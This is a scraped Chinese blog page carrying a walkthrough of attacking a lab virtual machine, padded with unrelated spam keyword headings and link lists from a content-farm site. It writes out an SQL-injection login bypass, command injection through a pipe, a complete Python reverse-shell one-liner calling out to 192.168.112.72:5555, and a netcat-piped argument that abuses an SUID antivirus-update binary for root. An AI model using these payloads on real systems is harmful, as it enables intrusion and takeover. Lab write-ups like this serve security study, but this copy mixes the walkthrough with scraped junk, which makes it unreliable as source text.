当前位置: 首页 > news >正文

关于做美食的小视频网站网站源码建站教程

关于做美食的小视频网站,网站源码建站教程,网站建设代码结构,wordpress搬家教程目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP, netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口: 开放22和8080,看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…

目录

信息搜集

WEB漏洞攻击

拿shell


信息搜集

首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务

WEB漏洞攻击

看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数

1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试

1" and left(version(),1)=5 --+

无果

直接万能密码开摆:

1" or 1=1 --+

emmmm,进来了

还是看看能否RCE

输入111|ls

拿shell

出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

http://www.yayakq.cn/news/450062/

相关文章:

  • 中山专业手机网站建设php怎么创建网站
  • 招商网站的建设目的注册好域名之后怎么做个人网站
  • 做网站商城需要什么软件买链接网
  • 麻江网站建设公司做网站域名归谁
  • wap网站 区别焦作建设网站哪家好
  • 怎样做班级网站山东省建设安全生产协会网站
  • 东明菏泽网站建设wordpress 共享
  • 开发一个个人网站广东网站建设联系电话
  • 手机网站 英文做网站的傻瓜软件
  • 潍坊做网站价格百度seo优化排名软件
  • 企业网站设计总结wordpress 评论关闭
  • 杂志网站建设青岛学网站建设的学校
  • 做视频网站需要网络设置网站
  • 南雄市住房和城乡建设局网站html免费网站模板
  • 网站后台iis配置动漫制作专业属于什么类型专业
  • 标题制作网站佛山网络公司 乐云seo
  • 建设汽车网站html标签 wordpress
  • 手机模板网站常见网页制作软件
  • 使用门户网站网络推广方法网站连接怎么做
  • 网站ip查询高端女装有哪些品牌
  • 网站运营与建设 教学大纲纯文字排版设计网站
  • 班级展示网站网站搭建官网
  • 网站模板备份织梦网站漏洞修复
  • 有哪些做的好的小众网站软件工程最吃香的三个专业
  • 做精神科网站转短链接在线生成
  • 广东网站建设公司有哪些做一个网站
  • 重庆便宜做网站的常州网站定制
  • 企业网站建设策划书1万字做网站销售一个星期的计划
  • 青岛网站建设大全江西建设工程质量管理网站
  • 南通网站定制费用手机网站开发 html